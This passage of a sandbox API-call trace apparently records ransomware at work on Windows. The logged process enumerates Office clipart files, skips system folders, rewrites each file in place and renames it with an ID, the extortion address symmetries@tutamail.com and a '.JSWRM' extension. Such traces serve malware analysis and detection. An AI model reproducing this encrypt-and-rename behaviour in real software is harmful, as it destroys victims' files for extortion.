nNumberOfBytesToWrite=0x4d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4d10, lpOverlapped=0x0) returned 1 [0092.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.745] CloseHandle (hObject=0x314) returned 1 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0092.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.745] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00052_.WMF", cAlternateFileName="")) returned 1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2=".") returned 1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="..") returned 1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="...") returned 1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="windows") returned -1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="recovery") returned -1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="perflogs") returned -1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="documents and settings") returned 1 [0092.746] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.747] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="system volume information") returned -1 [0092.747] lstrcmpiW (lpString1="PE00052_.WMF", lpString2="msocache") returned 1 [0092.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00052_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00052_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00052_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00052_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00052_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00052_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.747] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18412) returned 1 [0092.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x47e0) returned 0x24d210 [0092.748] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x47e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x47e0, lpOverlapped=0x0) returned 1 [0092.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.750] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x47e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x47e0, lpOverlapped=0x0) returned 1 [0092.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.750] CloseHandle (hObject=0x314) returned 1 [0092.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0092.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0092.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0092.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0092.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.751] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.752] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00231_.WMF", cAlternateFileName="")) returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2=".") returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="..") returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="...") returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="windows") returned -1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="recovery") returned -1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="perflogs") returned -1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="documents and settings") returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="system volume information") returned -1 [0092.752] lstrcmpiW (lpString1="PE00231_.WMF", lpString2="msocache") returned 1 [0092.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.753] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2228) returned 1 [0092.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x20c6c0 [0092.753] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.798] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0092.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.798] CloseHandle (hObject=0x314) returned 1 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0092.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0092.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0092.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.799] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.800] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00272_.WMF", cAlternateFileName="")) returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2=".") returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="..") returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="...") returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="windows") returned -1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="recovery") returned -1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="perflogs") returned -1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="documents and settings") returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="system volume information") returned -1 [0092.800] lstrcmpiW (lpString1="PE00272_.WMF", lpString2="msocache") returned 1 [0092.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00272_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00272_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00272_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00272_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00272_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00272_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0092.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.802] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2804) returned 1 [0092.802] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaf0) returned 0x23fc98 [0092.802] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xaf0, lpOverlapped=0x0) returned 1 [0092.804] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.804] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xaf0, lpOverlapped=0x0) returned 1 [0092.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.804] CloseHandle (hObject=0x314) returned 1 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0092.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0092.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0092.804] 